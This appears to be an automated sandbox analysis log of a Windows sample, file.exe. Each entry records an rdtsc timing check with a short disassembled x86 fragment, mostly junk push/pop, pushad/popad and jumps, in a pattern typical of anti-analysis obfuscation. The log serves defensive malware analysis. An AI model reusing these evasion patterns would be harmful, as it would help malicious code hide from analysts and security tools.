Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144747D second address: 1447483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1447483 second address: 14474AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1D94C8C5C3h 0x0000000a ja 00007F1D94C8C5B6h 0x00000010 popad 0x00000011 jl 00007F1D94C8C5BEh 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144EEC2 second address: 144EEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144F14C second address: 144F15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94C8C5BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144F15C second address: 144F162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144F162 second address: 144F19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1D94C8C5C9h 0x0000000b push esi 0x0000000c jmp 00007F1D94C8C5C7h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145B139 second address: 145B13F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145B13F second address: 145B145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145AB80 second address: 145AB85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145AB85 second address: 145AB8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145AB8B second address: 145AB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145D16B second address: 145D188 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1D94C8C5B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1D94C8C5BFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145CE37 second address: 145CE69 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1D94F8162Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F1D94F81638h 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145CE69 second address: 145CE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145CE6F second address: 145CE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145CE75 second address: 145CE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 146FD27 second address: 146FD2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 147793E second address: 1477959 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1477959 second address: 147795F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 147795F second address: 1477993 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1D94C8C5C6h 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F1D94C8C5B6h 0x00000010 jnl 00007F1D94C8C5B6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jo 00007F1D94C8C5B6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1477993 second address: 14779C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F81639h 0x00000007 jmp 00007F1D94F81638h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14779C8 second address: 14779CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14780D1 second address: 14780E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F81631h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14780E6 second address: 14780F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14780F0 second address: 14780F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 147EE95 second address: 147EEA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 147EEA6 second address: 147EEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 147EEAA second address: 147EEC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 147EEC7 second address: 147EECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E80D second address: 148E813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E813 second address: 148E81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1D94F81626h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E81D second address: 148E823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1488271 second address: 1488275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1488275 second address: 148828F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1D94C8C5C0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 149D31D second address: 149D343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F8162Ah 0x00000007 jmp 00007F1D94F81633h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 149D343 second address: 149D347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 149D347 second address: 149D34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 149D06A second address: 149D079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F1D94C8C5B6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B3F4A second address: 14B3F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B4240 second address: 14B4250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F1D94C8C5B6h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B4250 second address: 14B4255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B4255 second address: 14B4266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F1D94C8C5B6h 0x00000009 jc 00007F1D94C8C5B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B4266 second address: 14B4271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B4271 second address: 14B4288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B5BE0 second address: 14B5BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B71F2 second address: 14B71F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B9CA8 second address: 14B9CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F1D94F81626h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007F1D94F8162Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B9CBE second address: 14B9D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94C8C5C3h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F1D94C8C5B8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov dx, 9AEFh 0x00000029 mov dx, 3291h 0x0000002d push 00000004h 0x0000002f mov edx, edi 0x00000031 push CCF506A5h 0x00000036 push esi 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B9F7C second address: 14B9F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14BCB26 second address: 14BCB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007F1D94C8C5C6h 0x0000000b jns 00007F1D94C8C5B8h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F1D94C8C5C5h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F1D94C8C5C9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52103C8 second address: 52103CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52103CC second address: 52103D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52103D0 second address: 52103D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52103D6 second address: 521042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 64DB32F1h 0x00000008 pushfd 0x00000009 jmp 00007F1D94C8C5BEh 0x0000000e jmp 00007F1D94C8C5C5h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F1D94C8C5BAh 0x00000021 sub eax, 5D8E3C28h 0x00000027 jmp 00007F1D94C8C5BBh 0x0000002c popfd 0x0000002d mov ax, DD1Fh 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521042C second address: 521045C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1D94F8162Bh 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1D94F81637h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521045C second address: 5210460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210460 second address: 5210466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210466 second address: 521046C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521046C second address: 5210470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D3AEA second address: 13D3AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D3AEE second address: 13D3AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52104C1 second address: 52104C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52104C7 second address: 52104CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52104CB second address: 52104CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521053B second address: 52105B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F81639h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 1C0DC869h 0x0000000e jmp 00007F1D94F81637h 0x00000013 xor dword ptr [esp], 6B2FD441h 0x0000001a jmp 00007F1D94F81636h 0x0000001f call 00007F1E06F25087h 0x00000024 push 771B27D0h 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov eax, dword ptr [esp+10h] 0x00000034 mov dword ptr [esp+10h], ebp 0x00000038 lea ebp, dword ptr [esp+10h] 0x0000003c sub esp, eax 0x0000003e push ebx 0x0000003f push esi 0x00000040 push edi 0x00000041 mov eax, dword ptr [77240140h] 0x00000046 xor dword ptr [ebp-04h], eax 0x00000049 xor eax, ebp 0x0000004b push eax 0x0000004c mov dword ptr [ebp-18h], esp 0x0000004f push dword ptr [ebp-08h] 0x00000052 mov eax, dword ptr [ebp-04h] 0x00000055 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000005c mov dword ptr [ebp-08h], eax 0x0000005f lea eax, dword ptr [ebp-10h] 0x00000062 mov dword ptr fs:[00000000h], eax 0x00000068 ret 0x00000069 pushad 0x0000006a mov dx, cx 0x0000006d mov ch, EAh 0x0000006f popad 0x00000070 and dword ptr [ebp-04h], 00000000h 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F1D94F81630h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52105B3 second address: 52105D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1D94C8C5C0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52105D9 second address: 52105DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52105DD second address: 52105E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52105E3 second address: 521062A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F8162Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F1D94F8162Dh 0x00000013 pushfd 0x00000014 jmp 00007F1D94F81630h 0x00000019 sbb si, EB08h 0x0000001e jmp 00007F1D94F8162Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210705 second address: 521070A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521070A second address: 5210762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 5478h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b dec edi 0x0000000c jmp 00007F1D94F81637h 0x00000011 lea ebx, dword ptr [edi+01h] 0x00000014 jmp 00007F1D94F81636h 0x00000019 mov al, byte ptr [edi+01h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1D94F81637h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210762 second address: 5210786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210786 second address: 521078C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521078C second address: 5210792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210792 second address: 521081E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a jmp 00007F1D94F81638h 0x0000000f jne 00007F1E06F198F1h 0x00000015 jmp 00007F1D94F81630h 0x0000001a mov ecx, edx 0x0000001c pushad 0x0000001d mov di, ax 0x00000020 call 00007F1D94F8162Ah 0x00000025 push ecx 0x00000026 pop edx 0x00000027 pop esi 0x00000028 popad 0x00000029 shr ecx, 02h 0x0000002c jmp 00007F1D94F8162Dh 0x00000031 rep movsd 0x00000033 rep movsd 0x00000035 rep movsd 0x00000037 rep movsd 0x00000039 rep movsd 0x0000003b pushad 0x0000003c mov dh, cl 0x0000003e mov ax, di 0x00000041 popad 0x00000042 mov ecx, edx 0x00000044 jmp 00007F1D94F8162Bh 0x00000049 and ecx, 03h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F1D94F81635h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521081E second address: 5210898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rep movsb 0x0000000b jmp 00007F1D94C8C5BEh 0x00000010 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000017 pushad 0x00000018 call 00007F1D94C8C5BEh 0x0000001d pushfd 0x0000001e jmp 00007F1D94C8C5C2h 0x00000023 jmp 00007F1D94C8C5C5h 0x00000028 popfd 0x00000029 pop ecx 0x0000002a push edi 0x0000002b movzx esi, di 0x0000002e pop ebx 0x0000002f popad 0x00000030 mov eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F1D94C8C5BBh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210898 second address: 521089E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521089E second address: 52108A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52108A2 second address: 52108A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52108A6 second address: 52108B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp-10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52108B7 second address: 52108BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52108BB second address: 52108D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52108D3 second address: 52108D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52108D9 second address: 52108DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52108DD second address: 521092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], ecx 0x0000000f jmp 00007F1D94F81639h 0x00000014 pop ecx 0x00000015 jmp 00007F1D94F8162Eh 0x0000001a pop edi 0x0000001b pushad 0x0000001c mov bx, cx 0x0000001f mov ax, 9E59h 0x00000023 popad 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F1D94F8162Bh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521092C second address: 5210932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210932 second address: 5210936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210936 second address: 5210995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1D94C8C5C4h 0x00000013 sub si, AF48h 0x00000018 jmp 00007F1D94C8C5BBh 0x0000001d popfd 0x0000001e jmp 00007F1D94C8C5C8h 0x00000023 popad 0x00000024 leave 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov edi, 78CDCDC0h 0x0000002d mov ax, dx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210995 second address: 521053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F81632h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0008h 0x0000000c cmp dword ptr [ebp-2Ch], 10h 0x00000010 mov eax, dword ptr [ebp-40h] 0x00000013 jnc 00007F1D94F81625h 0x00000015 push eax 0x00000016 lea edx, dword ptr [ebp-00000590h] 0x0000001c push edx 0x0000001d call esi 0x0000001f push 00000008h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F1D94F81637h 0x00000028 rdtsc
